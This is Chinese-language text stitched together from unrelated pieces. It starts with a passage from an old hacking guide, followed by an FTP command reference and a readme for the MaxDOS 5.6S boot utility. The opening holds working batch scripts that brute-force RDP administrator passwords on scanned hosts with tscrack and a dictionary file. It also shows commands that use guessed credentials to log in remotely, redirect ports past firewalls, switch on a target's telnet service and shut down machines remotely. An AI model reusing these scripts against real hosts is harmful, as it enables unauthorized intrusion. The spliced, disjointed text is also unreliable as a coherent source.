-p 123456 用密码123456远程登陆192.168.0.1的administrator用户   @if not exist ipcscan.txt goto noscan   @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i   Nscan   @echo 3389.txt no find or scan faild   (①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)   3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat   @if not exist tscrack.exe goto noscan   @tscrack %1 -l administrator -w pass.dic >>rouji.txt   :noscan   @echo tscrack.exe no find or scan faild   (②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了)   hack.bat意思是:运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码,并将破解结果保存在rouji.txt文件中。   其它   Shutdown.exe   Shutdown IP地址 t:20 20秒后将对方NT自动关闭(Windows 2003系统自带工具,在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。)   fpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明(端口重定向绕过防火墙)   fpipe -l 80 -s 1029 -r 80 当有人扫锚你的80端口时,他扫到的结果会完全是的主机信息   Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后,就通过88端口发送到目标IP的23端口。(与目标IP建立Telnet时本机就用的88端口与其相连接)然后:直接Telnet 127.0.0.1(本机IP)就连接到目标IP的23端口了。   OpenTelnet.exe (远程开启telnet工具)   opentelnet.exe IP 帐号 密码 ntlm认证方式 Telnet端口 (不需要上传ntlm.exe破坏微软的身份验证方式)直接远程开启对方的telnet服务后,就可用telnet ip 连接上对方。   NTLM认证方式:0:不使用NTLM身份验证;1:先尝试NTLM身份验证,如果失败,再使用用户名和密码;2:只使用NTLM身份验证。   ResumeTelnet.exe (OpenTelnet附带的另一个工具)   resumetelnet.exe IP 帐号 密码 用Telnet连接完对方后,就用这个命令将对方的Telnet设置还原,并同时关闭Telnet服务。   FTP命令详解   FTP命令是Internet用户使用最频繁的命令之一,熟悉并灵活应用FTP的内部命令,可以大大方便使用者,并收到事半功倍之效。如果你想学习使用进行后台FTP下载,那么就必须学习FTP指令。   FTP的命令行格式为:   ftp -v -d -i -n -g [主机名] ,其中   -v 显示远程服务器的所有响应信息   -n 限制ftp的自动登录,即不使用;.n etrc文件;   -d 使用调试方式;   -g 取消全局文件名。   FTP使用的内部命令如下(中括号表示可选项):   1.![cmd[args]]:在本地机中执行交互shell,exit回到ftp环境,如:!ls*.zip   2.$ macro-ame[args]:执行宏定义macro-name。   3.account[password]:提供登录远程系统成功后访问系统资源所需的补充口令。    4.append local-file[remote-file]:将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。   5.ascii:使用ascii类型传输方式。   6.bell:每个命令执行完毕后计算机响铃一次。   7.bin:使用二进制文件传输方式。   8.bye:退出ftp会话过程。   9.case:在使用mget时,将远程主机文件名中的大写转为小写字母。   10. cd remote-dir:进入远程主机目录。   11.cdup:进入远程主机目录的父目录。   12.chmod mode file-name:将远程主机文件file-name的存取方式设置为mode,如:chmod 777 a.out。   13.close:中断与远程服务器的ftp会话(与open对应)。   14 .cr:使用asscii方式传输文件时,将回车换行转换为回行。   15.delete remote-file:删除远程主机文件。   16.debug[debug-value]:设置调试方式, 显示发送至远程主机的每条命令,如:deb up 3,若设为0,表示取消debug。   17.dir[remote-dir][local-file]:显示远程主机目录,并将结果存入本地文件。    18.disconnection:同close。   19.form format:将文件传输方式设置为format,缺省为file方式。   20.get remote-file[local-file]:将远程主机的文件remote-file传至本地硬盘的local-file。   21.glob:设置mdelete,mget,mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。   22.hash:每传输1024字节,显示一个hash符号(#)。   23.help[cmd]:显示ftp内部命令cmd的帮助信息,如:help get。    24.idle[seconds]:将远程服务器的休眠计时器设为[seconds]秒。 25.image:设置二进制传输方式(同binary)。 26.lcd[dir]:将本地工作目录切换至dir。 27. ls[remote-dir][local-file]:显示远程目录remote-dir, 并存入本地文件local-file。 28.macdef macro-name:定义一个宏,遇到macdef下的空行时,宏定义结束。 29.mdelete[remote-file]:删除远程主机文件。 30.mdir remote-files local-file:与dir类似,但可指定多个远程文件,如 :mdir *.o.*.zipoutfile。 31.mget remote-files:传输多个远程文件。 32.mkdir dir-name:在远程主机中建一目录。 33.mls remote-file local-file:同nlist,但可指定多个文件名。 34.mode[modename]:将文件传输方式设置为modename, 缺省为stream方式。    modtime file-name:显示远程主机文件的最后修改时间。 mput local-file:将多个文件传输至远程主机。 newer file-name:如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。   38.nlist[remote-dir][local-file]:显示远程主机目录的文件清单,并存入本地硬盘的local-file。   39.nmap[inpattern outpattern]:设置文件名映射机制, 使得文件传输时,文件中的某些字符相互转换, 如:nmap $1.$2.$3[$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名变为a1,a2。该命令特别适用于远程主机为非UNIX机的情况。   40.ntrans[inchars[outchars]]:设置文件名字符的翻译机制,如ntrans1R,则文件名LLL将变为RRR。   41.open host[port]:建立指定ftp服务器连接,可指定连接端口。   42.passive:进入被动传输方式。   43.prompt:设置多个文件传输时的交互提示。   44.proxy ftp-cmd:在次要控制连接中,执行一条ftp命令, 该命令允许连接两个ftp服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务器间的连接。   45.put local-file[remote-file]:将本地文件local-file传送至远程主机。   46.pwd:显示远程主机的当前工作目录。   47.quit:同bye,退出ftp会话。   48.quote arg1,arg2...:将参数逐字发至远程ftp服务器,如:quote syst.   49.recv remote-file[local-file]:同get。   50.reget remote-file[local-file]:类似于get, 但若local-file存在,则从上次传输中断处续传。   51.rhelp[cmd-name]:请求获得远程主机的帮助。   52.rstatus[file-name]:若未指定文件名,则显示远程主机的状态, 否则显示文件状态。   53.rename[from][to]:更改远程主机文件名。   54.reset:清除回答队列。   55.restart marker:从指定的标志marker处,重新开始get或put,如:restart 130。   56.rmdir dir-name:删除远程主机目录。   57.runique:设置文件名只一性存储,若文件存在,则在原文件后加后缀.1, .2等。   58.send local-file[remote-file]:同put。   59.sendport:设置PORT命令的使用。   60.site arg1,arg2...:将参数作为SITE命令逐字发送至远程ftp主机。   61.size file-name:显示远程主机文件大小,如:site idle 7200。   62.status:显示当前ftp状态。   63.struct[struct-name]:将文件传输结构设置为struct-name, 缺省时使用stream结构。   64.sunique:将远程主机文件名存储设置为只一(与runique对应)。   65.system:显示远程主机的操作系统类型。   66.tenex:将文件传输类型设置为TENEX机的所需的类型。   67.tick:设置传输时的字节计数器。   68.trace:设置包跟踪。   69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:type binary,设置二进制传输方式。   70.umask[newmask]:将远程服务器的缺省umask设置为newmask,如:umask 3   71.user user-name[password][account]:向远程主机表明自己的身份,需要口令时,必须输入口令,如:user anonymous my@email。   72.verbose:同命令行的-v参数,即设置详尽报告方式,ftp 服务器的所有响 应都将显示给用户,缺省为on.   73.?[cmd]:同help.
很好用的U盘系统盘制作工具这次出的所谓MaxDOS 密码读取工具,其实只是读取了安装日志LOG里的设置值,并不是真正的MD5值被编译,本来不想保留这个东西的,但是如果不保留这个LOG文件的话,又无法完成自动卸载,怕有些人又说是什么恶意软件,卸载都不能,你出了个密码读取器对我来说没什么损失,但是你害的人可能更多,你也辛苦跟踪了这个安装文件这么久...如果密码不想被读取很简单,就是直接删除 x:\windows\system32\sys56s.ini (2000为winnt) 这个文件,或者将其改名成其它文件名,他就读不出来了,但是如果删除了这个文件就会造成无法自动卸载 MAXDOS程序,当然你也可以备份一份起来再删除...如果不懂的删的话,直接下载附件中的程序运行一下就会自动删除.这个问题我会在近期解决.对此造成的问题我也有错,对不起... MaxDOS 5.6S 说明文件 如果您有何问题,请在此跟贴,或者到我论坛中发问。谢谢。 1.加入了10多种新型网卡驱动,以及更新以前一些驱动存在的问题. 2.支持DOS下直接访问局域网的共享资源,可以读写共享目录,当然要共享目录要开启写权限. 当然您还可以使用此功能来实现网刻,在GHOST直接调用共享目录里的.GHO文件. 3.新型的网刻模式,让菜鸟也懂的网刻.全操作中文界面,只需一键即可完成网刻. 4.支持引导自已制作的标准1.44M/2.88M IMG镜像,请将镜像更名为MaxDiy.IMG存放到C:\的 根目录下(即C:\MaxDiy.IMG)就可以正常引导.且可以在安装时设置密码. 5.加入一键恢复/备份,可直接在菜单中选择备份或还原镜像.支持镜像存放在 D/E/F/G分区. 6.新的NTFS分区读写程序,更稳定,且支持LINUX的ext2/ext3和隐藏分区读写,支持长文件名. 7.加入HDDREG 1.51版,MHDD 4.6版,以及SPFDISK中文版. 8.更新GHOST为 8.3版,不过这里要说一下喜欢玩新的朋友,GHOST 8.2版不支持 GHOST 8.3 版制作的镜像.也就是说如果您用 8.3做好母盘的镜像,以前MAXDOS 5.5S客户端的将不能 识别8.3制作的镜像。如果要使用 8.3版GHOST,请记住母盘的镜像一样要使用GHOST 8.2 来制作.您可以将 GHOST 8.2存放在硬盘中调用. 9.修正上个版本的一些小问题,以及汉化一些程序. 10.加入对USBCD的支持. 同时在我们的网站上也即将提供了MAXDOS 5.6s的光盘版,PXE镜像版,U盘版,以及一些插件.如 果您需要这些,请访问我们的网站 Http://Www.Pzz.Cn 或者 Http://Www.MaxDOS.Net 11.加入了新网卡驱动如下: nForce 1/2/3/4 系列 ULi PCI Fast Ethernet Controller ULi Electronics Inc. Realtek RTL8136/810x Family Fast Ethernet NIC Realtek RTL8168/8111 PCI-E Gigabit Ethernet NIC D-Link DFE-550TX FAST Ethernet 10/100 Adapter Sundance ST201 based Adapter NT Driver D-link DGE-530TX FAST Ethernet 10/100 Adapter Tenda 8139D VIA Networking Velocity-Family Gb Ethernet Adapter INTEL PRO 1000 的新系列10多种. INTEL PRO 100 的新系列6种. RADTEK RTK8189C Based Fast Ethernet Card Marvell Yukon PCI 添加了10多种型号. 以及修正 VIA Rhine 系列网卡存在的问题。 更新了一些旧版本中驱动中存在的问题,所有驱动更新为最新版本的DOS驱动. Nforce 4系列可能有个别主板不兼容,问过官方得到的答案是由于主板厂商为节省材料使 用了软芯片造成,这一般发生在杂牌主板上. &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& MaxDOS 5.6s 安装启动后有如下七个选项: 选项A. MaxDOS工具集+Packet网卡驱动网刻 解: MaxDos 的所有工具,包括PACKET的DOS驱动都在些选项.进入后全中文界面,以及全自动 加载网卡驱动.可以选择全盘或单分区刻隆.就不再多加解释了,进入后都懂. PACKET网卡共支持以下几种网卡: 3C905PKT.com 3Com EtherLink PCI Bus Master Packet Driver (3COM 905) 3C90XPD.COM 3Com Fast EtherLink XL 10/100Mb TX Ethernet NIC (3C90X) E310.COM Adico AE310-TX PCI 10/100 Fast Ethernet Adapter AMDPCNET.com AMD PCnet Family DCN530tx.COM DCN-530TX PCI Ethernet Adapter V1.00 (2002.0411) DFE530TX.COM D-Link DLE-530TX PCI NIC (Rev B) V2.53 (2000.0525) DLE530TX.COM D-Link DFE-530TX PCI NIC V4.10 (2002.0703) IP100PD.COM IC Plus IP100 based Fast Ether Adapter V3.03 (2003.0411) PRO100.COM Intel EtherExpress(tm) PRO/10 & PRO/100B PCI,(已更新,可用) RTL8029.COM Realtek RTL8029(AS) PCI Ethernet NIC 1998 RTL8139.COM Realtek RTL8139 Family PCI Fast Ethernet NIC v3.40 SIS900.EXE SiS 900/7016 PCI Fast Ethernet Adapter V1.15 (2002.0816) VIA.COM VIA Rhine I/II Family Fast Ether Adapter V4.16 (已更新,可用) NV.EXE GHOST自带的万能PACKET驱动,如果您有的网卡不能驱动,请尝试此驱动 有人提过此驱动,可驱动NF系列的网卡,如果选项3不成功,可尝试此驱动,见下面的命令行. 5.6S版本网刻服务器的IP应为: 10.1.1.1 奄码为: 255.0.0.0 GHOSTSRV会话名称:max 客户端谁进去都懂的用了因为都是全中文菜单模式,在这里就不再介绍,以下为旧版模式. 友情提醒:您也可以使用新版的网刻模式和旧版网刻模式结合,实现两批机器一起网刻. 关于旧版本的网刻模式,依然是存在的.5.5S或更早旧版本里命令行模式PKT驱动网刻说 明:先将要做为网刻服务端的IP地址改为:192.168.5.100 子奄码为:255.255.255.0 其它网关和DNS的可以都去掉,也可随意保留.然后打开GHOSTSRV服务端,把GHOSTSRV里面的 会话名称改为:max (如果您没有GHOSTSRV,请到我们的网站中下载 Http://Bbs.Pzz.Cn) 一定要是max,否则客户机会连不上, 为什么要用192.168.5.100的IP呢,因为有人说如果 IP网段跟内网机器使用的网段不同的话,可以加快网刻速度,所以故意将服务器IP指为, 192.168.5.100 以隔开别的网段!当然没有实际证明. 5.5S或更早的版本客户机上设置如下,例 VIA 网卡用户请使用格式: VIAGO 45 (VIAGO为自动批处理文件,45为您要设置的客户机IP的最后一位数,前面的192.168.5不用 输入的,输入为自后自动激活网卡,及IP奄码配置文件,自动生成IP地址为 192.168.5.45 子奄码为:255.255.255.0 网关:192.168.5.100),详细请见下表各网卡的批处理. 以下为5.5S版本或更旧的版本,全盘网刻例子: NV 网卡,自动网刻命令格式如后----> NVGO X (X为客户机IP,不准从复) 3C90X 网卡,自动网刻命令格式如后----> 3C90XGO X (X为客户机IP,不准从复) DCN530TX 网卡,自动网刻命令格式如后----> DCN530GO X (X为客户机IP,不准从复) DFE530TX 网卡,自动网刻命令格式如后----> DFE530GO X (X为客户机IP,不准从复) DLE530TX 网卡,自动网刻命令格式如后----> DLE530GO x (X为客户机IP,不准从复) IP 100 网卡,自动网刻命令格式如后----> IP100GO X (X为客户机IP,不准从复) PRO100 网卡,自动网刻命令格式如后----> PRO100GO x (X为客户机IP,不准从复) RTL8029 网卡,自动网刻命令格式如后----> 8029GO X (X为客户机IP,不准从复) RTL8139 网卡,自动网刻命令格式如后----> 8139GO X (X为客户机IP,不准从复) SIS900 网卡,自动网刻命令格式如后----> SIS900GO X (X为客户机IP,不准从复) VIA 网卡,自动网刻命令格式如后----> VIAGO X (X为客户机IP,不准从复) 以下为5.5S版本或更旧的版本,单盘网刻例子: NV 网卡,单分区网刻命令格式如后----> NVGX X (X为客户机IP,不准从复) 3C90X 网卡,单分区网刻命令格式如后----> 3C90XGX X (X为客户机IP,不准从复) DCN530TX 网卡,单分区网刻命令格式如后----> DCN530GX X (X为客户机IP,不准从复) DFE530TX 网卡,单分区网刻命令格式如后----> DFE530GX X (X为客户机IP,不准从复) DLE530TX 网卡,单分区网刻命令格式如后----> DLE530GX X (X为客户机IP,不准从复) IP 100 网卡,单分区网刻命令格式如后----> IP100GX X (X为客户机IP,不准从复) PRO100 网卡,单分区网刻命令格式如后----> PRO100GX X (X为客户机IP,不准从复) RTL8029 网卡,单分区网刻命令格式如后----> 8029GX X (X为客户机IP,不准从复) RTL8139 网卡,单分区网刻命令格式如后----> 8139GX X (X为客户机IP,不准从复) SIS900 网卡,单分区网刻命令格式如后----> SIS900GX X (X为客户机IP,不准从复) VIA  网卡,单分区网刻命令格式如后----> VIAGX X (X为客户机IP,不准从复) 注意,前一个X不代表任何意义,后一个X才代表IP的最后一组数字. &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& B. 使用NDIS2网卡驱动全自动网刻 5.6S版本网刻服务器的IP应为: 10.1.1.1 奄码为: 255.0.0.0 GHOSTSRV会话名称:max 客户端谁进去都懂的用了因为都是全中文菜单模式,在这里就不再介绍,以下为旧版模式. 友情提醒:您也可以使用新版的网刻模式和旧版网刻模式结合,实现两批机器一起网刻. 关于旧版本的网刻模式,依然是存在的.5.5S或更早旧版本里命令行模式NDIS2驱动网刻, 选择此选项后,默认的会自动加载好您本机的网卡驱动,您可以使用NDISGO X (后面的X代 表您的IP最后一组数字,如: 192.168.5.123 只需输入 NDISGO 123 ) 来实现全盘网刻,因为启动此选项后已经自动加载好网卡驱动,本机的驱动都已经打完,不 管任何网卡都只要输入NDISGO X 来实现全盘刻,和NDISGX X来实现单分区刻即可(当然首 先还是要准备好服务器的情况下的,服务器IP设为:192.168.5.100,子奄码:255.255.255.0 其它不用设,安全起见最好从起一下服务端,然后打开GHOSTSRV,把里面的会话名称设为:max 一定要设为max才可连上),使用NDIS网刻时,无须再像PKT那样输入8139GO,DFE530GO等,不管 任何网卡全盘刻只要输入NDISOGO x (x为客户机的IP最后一位,如 192.168.5.1 只须输入 NDISGO 1 而不是 NDISGO 192.168.5.1 且不能使用 100和超过 255的后面IP)如果您的PKT 驱动不能网刻或没有驱动的话,可以试试用NDIS驱动来网刻! NDIS2驱动支持的网卡所有系列如下: 3Com EtherLink PCI TPO NIC (3C900-TPO) 3Com EtherLink PCI Combo NIC (3C900-COMBO) 3Com EtherLink PCI TPO NIC (3C900B-TPO) 3Com EtherLink PCI Combo NIC (3C900B-COMBO) 3Com EtherLink PCI TPC NIC (3C900B-TPC) 3Com EtherLink PCI Fiber NIC (3C900B-FL) 3Com EtherLink 10/100 PCI NIC (3C905-TX) 3Com EtherLink 10/100 PCI T4 NIC (3C905-T4) 3Com 3C918 Integrated Controller (3C905B-TX Compatible) 3Com EtherLink 10/100 PCI Combo NIC (3C905B-COMBO) 3Com EtherLink 100 PCI Fiber NIC (3C905B-FX) 3Com 3C920 Integrated Controller (3C905C-TX Compatible) 3Com 3C920B-EMB Integrated Fast Ethernet Controller 3Com 3C920B-EMB-WNM Integrated Fast Ethernet Controller 3Com Gigabit NIC (3C940/3C2000) ADMtek AN983 10/100Mbps Fast Ethernet Adapter ADMtek AN983 based Ethernet Adapter ADMtek AN985 10/100Mbps Fast Ethernet Adapter ADMtek ADM9511 10/100Mbps Fast Ethernet Adapter ADMtek ADM9513 10/100Mbps Fast Ethernet Adapter AMD PCNet Family Ethernet Adapter Broadcom 440x 10/100 Integrated Controller Broadcom 440x 10/100 Integrated Controller Broadcom NetXtreme Gigabit Ethernet Controller Broadcom 570x 10/100 Integrated Controller Broadcom NetLink (TM) Gigabit Ethernet Controller Broadcom NetXtreme Gigabit Fiber Broadcom NetXtreme Gigabit Ethernet Controller Broadcom NetXtreme Fast Ethernet Controller DAVICOM DM9 Series PCI Fast Ethernet Adapter DEC Digital Semiconductor 21040 Ethernet Controller DEC Digital Semiconductor 21140 Ethernet Controller DEC Digital Semiconductor 21041 Ethernet Controller DEC Digital Semiconductor 21143/2 Ethernet Controller DigitalChina DCN-530TX Fast Ethernet Adapter D-Link DFE-530TX PCI Fast Ethernet Adapter (rev.A) D-Link DFE-530TX PCI Fast Ethernet Adapter (rev.D) D-Link DFE-530TX PCI Fast Ethernet Adapter (rev.B/A) D-Link DFE-530TX PCI Fast Ethernet Adapter (rev.C) IC Plus IP100 based Fast Ethernet Adapter Intel PRO/100 Mobile Adapters Intel PRO/100 VE Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VM Network Connection Intel 82562EH based Phoneline Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 M Mobile Connection Intel PRO/100 VE Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VE Network Connection Intel 82559ER Fast Ethernet Controller Intel PRO/100+ PCI Adapter Intel PRO/100 Network Connection Intel 82562 based Fast Ethernet Connection Intel 82562 based Fast Ethernet Connection Intel PRO/1000 Gigabit Server Adapter Intel PRO/1000 F Server Adapter Intel PRO/1000 T Server Adapter Intel PRO/1000 XT Network Connection Intel PRO/1000 XF Network Connection Intel PRO/1000 T Network Connection Intel PRO/1000 XT Network Connection Intel PRO/1000 MT Network Connection Intel PRO/1000 MT Network Connection Intel PRO/1000 MT Dual Port Network Connection Intel PRO/1000 MF Server Adapter Intel PRO/1000 MF Dual Port Network Connection Intel PRO/1000 MT Network Connection Intel PRO/1000 MT Mobile Connection Intel PRO/1000 MT Mobile Connection Intel PRO/1000 MT Mobile Connection Intel PRO/1000 CT Network Connection Intel PRO/1000 MT Quad Port Network Connection Intel PRO/1000 MT Mobile Connection Intel PRO/1000 MT Server Connection Intel PRO/1000 MF Server Adapter Intel PRO/1000 MB Server Connection Intel PRO/1000 PT Dual Port Network Connection Intel(R) PRO/1000 PF Dual Port Server Adapter Intel(R) PRO/1000 PB Dual Port Server Connection Intel PRO/1000 CT Network Connection Intel PRO/1000 MT Network Connection Intel PRO/1000 MT Mobile Connection Intel PRO/1000 MT Dual Port Network Connection Intel PRO/1000 MF Dual Port Network Connection Intel PRO/1000 MB Dual Port Server Connection Intel PRO/1000 GT Desktop Adapter Intel(R) PRO/1000 PT Server Adapter Intel(R) PRO/1000 PF Server Adapter Intel(R) PRO/1000 PB Server Connection Intel(R) PRO/1000 PM Network Connection Intel(R) PRO/1000 P Network Connection Intel(R) PRO/1000 PL Network Connection Marvell Yukon PCI (PCI-E) Gigabit Controller Marvell Yukon 88E8001/8003/8010 PCI Gigabit Controller Marvell Yukon 88E8035 PCI-E Fast Controller Marvell Yukon 88E8036 PCI-E Fast Controller Marvell Yukon PCI (PCI-E) Gigabit Controller Marvell Yukon PCI (PCI-E) Gigabit Controller Marvell Yukon 88E8052 PCI-E ASF Gigabit Controller Marvell Yukon 88E8050 PCI-E ASF Gigabit Controller Marvell Yukon 88E8053 PCI-E Gigabit Controller Marvell Yukon PCI (PCI-E) Gigabit Controller RealTek RTL8029 PCI Ethernet Adapter RealTek RTL8139/810x Family Fast Ethernet Adapter $ Realtek RTL8169/8110 Family Gigabit Ethernet Adapter SiS 900-Based PCI Fast Ethernet Adapter VIA VT86C100A Rhine Fast Ethernet Adapter VIA Rhine III Management Adapter VIA Rhine II Fast Ethernet Adapter VIA Rhine III Fast Ethernet Adapter Legend DFE-530TX PCI Fast Ethernet Adapter (Rev A) Legend DFE-530TX PCI Fast Ethernet Adapter (Rev B/A) ULi PCI Fast Ethernet Controller ULi Electronics Inc. Realtek RTL8136/810x Family Fast Ethernet NIC Realtek RTL8168/8111 PCI-E Gigabit Ethernet NIC D-Link DFE-550TX FAST Ethernet 10/100 Adapter Sundance ST201 based Adapter NT Driver D-Link DGE-530T Gigabit Ethernet Adapter VIA Networking Velocity-Family Gb Ethernet Adapter RADTEK RTK8189C Based Fast Ethernet Card 支持200多种网卡,还有很多没列出,如果您不知道网卡型号,可尝试使用此项. &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& C. nForce 1/2/3/4网卡驱动网刻 nForce MCPx 系列网卡网络刻隆项.由于NF驱动的驱动占用了太大内存,造成无法加载 中文程序,只能使用旧版的NDISGO XX 和 NDISGX XX 命令网刻. NDISGO为全盘网刻命令,后面的XX可以是 1-99和101-254 不得重复. NDISGX为单分网刻命令,后面的XX可以是 1-99和101-254 不得重复.前面的X不作任何代表. 请先将服务端IP设为:192.168.5.100 奄码: 255.255.255.0 GHOSTSRV会话名: max NFORCE的网卡需要同时加载两个网卡驱动文件,无法在自动加载中加载,只能另行加载! 如果您使用此选项存在问题,请尝试使用选项A的GHOST自带万能驱动. &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 选项D. DOS下访问局域网共享资源 进入此项后,系统会自动帮您加载好网卡驱动,并且设置好连接的协议,而且是全中文菜单, 您可以在进入此项后,直接获得局域网里WINDOWS主机上的共享资源,而且支持读写操作当然 这前提您要开启权限.才能实现写操作,您可以根据菜单里的提示操作,也可以使用如NT主机 上的NET命令来实现连接到共享目录,命令行如: net use z: \\max\f 此命令的意思是将Z: 盘,映射到"Max"主机上的"f"为名称的共享目录.您可以参考NT的NET命 令在NT主机上使用 NET /? 或 NET USE /? 获得帮助,当然可能有个别命令不支持. 此选项还包含了 EMM386驱动程序,如果您有特别要求需要用到 EMM386时,可以使用此选项. 友情提醒:您只能通过机器名称来连接您的主机,而不能使用IP地址来连接您的主机.而且您 还能使用此项进行网刻操作,映射好如Z:盘 ,然后在GHOST中选择Z:盘共享目录中的".GHO" 镜像还原或备份进去. 注意:您要访问的机器的工作组必须是: workgroup 而且您被访问的机器必须安装IPX协议 &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 选项E. 还原D:\bak\sys.gho镜像 自动还原 D:\BAK\SYS.GHO 到C盘中!方便自动恢复! &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 选项F. 驱动USB设备 用来驱动U盘.USB硬盘.USB光驱,驱动后就可以在DOS下访问U盘和USB硬盘的内容了! &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 选项G. 纯DOS模式 用于刷BIOS或运行其它特殊软件.不加载任何东西,无虚拟盘. &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& MAXDOS内置的命令及工具说明: 12.BAT 将第一硬盘GHOST到第二硬盘,注意确认好哪个是第一和第二硬盘哦 21.BAT 将第二硬盘GHOST到第一硬盘,注意确认好哪个是第一和第二硬盘哦 ACOPY.COM 能够完全复制文件和目录,包括它们的长文件名和属性. CHOICE.COM 选择命令,返回按键的ERRORLEVEL值. CLOSE.COM 关闭CD-ROM. Coms.com 一个清除CMOS密码和设置的程序. Mouse.bat 可以直接加载鼠标,以及DOS下使用剪切板程序. CTMOUSE.EXE CuteMouse 1.9版,DOS下最好最实用的鼠标驱动程序. MOUSCLIP.EXE DOS下(包括命令行下)用鼠标复制/粘帖及模拟方向键的工具 DELTREE.COM 删除目录和文件的工具. DEVICE.COM 用命令行模式加载 .SYS 驱动. Diskgen.exe 强大的DOS下中文分区软件.一直用它.Max强烈推荐,强过DM. DREADY.COM 判断驱动器状态,检查光驱中是否有光盘、软盘是否写保护. EXLAN.bat 如果要手动网刻的话.请运行这个解压出DOS的网卡驱. FIND.COM 查找工具的最好的替代程序. FINDCD.EXE 实用的查找光驱盘符的程序. ghost.exe GHOST 8.3 版,如果运行了NTFSDOS.请用Qntfs退出后再运行. IO.SYS MS-DOS 7.10系统内核引导文件.IO输入输出. LABEL.COM 非常小巧的修改磁盘卷标的工具 off.COM 关闭计算机用的..呵呵.. OPEN.COM 打开光驱哦.运行一下光驱自动打开. password.bat DOS下清除2K/XP/2K3的用户密码.支持NTFS/FAT32分区.MAX强烈推荐 PCTOOL.EXE DOS下的类似于WIN资源管理器 pkzip.COM 解压压缩包ZIP用. RANDOM.COM 自动生成字符的东西.可以用来自动分配IP. readme.txt 呵呵.我在这呢. MaxDOS Http://Pzz.Cn r.com 运行一下就知道效果啦,呵呵.重启动计算机用的. SHSUCD1.COM LOADISO用的虚拟光驱驱动. SHSUCDHD.EXE 忘了什么东西啦.呵呵.等下试试. SHSUCDX.EXE 最NB的DOS光驱驱动程序. SPFDISK.BAT 启动管理器+分区管理器,功能强大 TW.BAT 天汇中文系统,支持五笔.拼音.区位.双拼输入法.用QUIT退出! twx.zip 天汇的主程序较大.压缩在这里面了. W.BAT WAIT配置文件. WAIT.COM 用于批处理文件的等待工具,且支持键盘返回值等操作 wbat.com DOS下强大的批处理菜单生成器. Xcopy.EXE 强大的复制程序,可复制带文件夹的目录,加载tw后,使用Xcopy /? XMSDSK.EXE 最好的虚拟内存盘工具,非常方便实用,且只占很少的内存 XDEL.EXE 类似于WIN2K下的RD,可删除目录和子目录里文件. MEM.EXE DOS查看内存占用情况. ADDEV.COM DOS命令行下加载.SYS驱动. ATTRIB.COM 文件/文件夹属性设置命令. DEBUG.EXE 强大的DOS下编程命令. DELDEV.COM 卸载用ADDEV添加的.SYS驱动. EDIT.COM 相当于记事本. FAKEDISK.COM 用来解压.IMG镜像 FDISK.EXE 分区命令 FORMAT.COM 格式化命令 SMARTDRV.EXE DOS下磁盘缓存程序.加载一下可大提高DOS安装系统. SYS.COM 传输MSDOS 7.01 的引导文件到C盘.使用C盘可以引导到DOS. TREE.COM 显示排序命令. Ndisgo 用于旧版本的命令行模式全盘网刻,格式: NDISGO xx Ndisgx 用于旧版本的命令行模式单分区网刻,格式: NDISGX xx AutoGO.bat 5.6版NDIS2驱动的自动网刻菜单.请在选项了引导的第二项时使用. Menu.bat 5.6版选项第一项引导的主菜单,包含PKT驱动网刻及一键恢复备份. Mhdd.bat Mhdd 4.6 强大的磁盘扫描修复程序.强于效率源. NTFSDOS.BAT 新版本的NTFS分区访问程序,支持读写NTFS/EX2/EX3等分区. Qntfs.bat 用于退出NTFSDOS读写分区长驻内存. Quit.exe 用于退出天汇汉字系统,也可以使用 tway /q退出! Hddreg.bat HDDREG 1.51版 俄罗斯出品的硬盘检测程序. LOADISO.BAT DOS下载入ISO光盘镜像.只能读取.不能引导.但可装2K/XP/2K3系统 